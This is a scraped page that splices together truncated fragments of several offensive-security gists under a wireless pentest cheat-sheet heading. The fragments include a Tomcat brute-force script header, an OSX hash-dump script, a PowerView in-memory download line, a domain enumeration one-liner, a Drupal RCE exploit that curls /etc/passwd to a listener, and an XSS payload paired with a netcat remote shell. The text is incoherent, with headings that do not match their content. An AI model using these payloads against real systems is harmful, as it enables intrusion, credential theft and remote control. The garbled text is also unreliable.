#Wireless Penetration Testing Cheat Sheet
##WIRELESS ANTENNA
- Open the Monitor Mode
root@uceka:~# ifconfig wlan0mon down
root@uceka:~# iwconfig wlan0mon mode monitor
root@uceka:~# ifconfig wlan0mon up
filipesam
initbrain
/ http-tomcat-manager.nse
Last active
November 29, 2021 07:11
Nmap NSE script that performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| local shortport = require "shortport" | |
| local http = require "http" | |
| local stdnse = require "stdnse" | |
| local brute = require "brute" | |
| local creds = require "creds" | |
| description = [[ | |
| Performs a dictionary/bruteforce attack over login and password fields of Apache Tomcat default web management pages. | |
| ]] |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # extracts OSX user hashes and outputs a format crackable with oclHashcat | |
| # adapted from http://apple.stackexchange.com/questions/186893/os-x-10-9-where-are-password-hashes-stored | |
| # and https://web.archive.org/web/20140703020831/http://www.michaelfairley.co/blog/2014/05/18/how-to-extract-os-x-mavericks-password-hash-for-cracking-with-hashcat/ | |
| # | |
| # automation of approach by @harmj0y | |
| # | |
| # sudo ./osx_hashdump.py | |
| # ./oclHashcat64.bin -m 7100 hash.txt wordlist.txt |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Import PowerView into memory without touching disk | |
| # IEX (New-Object Net.WebClient).DownloadString('http://HOST/powerview.ps1') | |
| ################################### | |
| # Hunting for Users | |
| ################################### | |
| # search for administrator groups |
KyleHanslovan
/ DomainEnumeration.bat
Created
June 25, 2016 12:36
Post-exploitation host/domain survey using native Windows commands.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1 |
dogrocker
/ Wireless Penetration Testing Cheat Sheet.md
Created
July 2, 2016 18:30
Wireless Penetration Testing Cheat Sheet
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?php | |
| # Drupal module Coder Remote Code Execution (SA-CONTRIB-2016-039) | |
| # https://www.drupal.org/node/2765575 | |
| # by Raz0r (http://raz0r.name) | |
| $cmd = "curl -XPOST http://localhost:4444 -d @/etc/passwd"; | |
| $host = "http://localhost:81/drupal-7.12/"; | |
| $a = array( |
pwneddesal
/ .md
Created
August 19, 2016 06:54
— forked from chtg/.md
PHP Session Data Injection Vulnerability
#PHP Session Data Injection Vulnerability
Taoguang Chen <@chtg57> - Write Date: 2016.7.27 - Release Date: 2016.8.18
PHP's session php/php_binary handlers wrongly handles the session name cause arbitrarily session data injection.
Affected is PHP 5 < 5.6.25
Affected is PHP 7 < 7.0.10
wavezhang
/ java_download.sh
Last active
April 12, 2025 15:55
download java from oracle without login
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| wget -c --no-cookies --no-check-certificate --header "Cookie: oraclelicense=accept-securebackup-cookie" https://download.oracle.com/otn-pub/java/jdk/12.0.2+10/e482c34c86bd4bf8b56c0b35558996b9/jdk-12.0.2_linux-x64_bin.tar.gz |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from scapy.all import * | |
| import time, sys | |
| pkts = rdpcap(sys.argv[1]) | |
| clk = pkts[0].time | |
| for p in pkts: | |
| time.sleep(p.time - clk) | |
| clk = p.time | |
| sendp(p) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Attacker: while :; do printf "j$ "; read c; echo $c | nc -lp PORT >/dev/null; done | |
| Victim: <svg/onload=setInterval(function(){d=document;z=d.createElement("script");z.src="//HOST:PORT";d.body.appendChild(z)},0)> |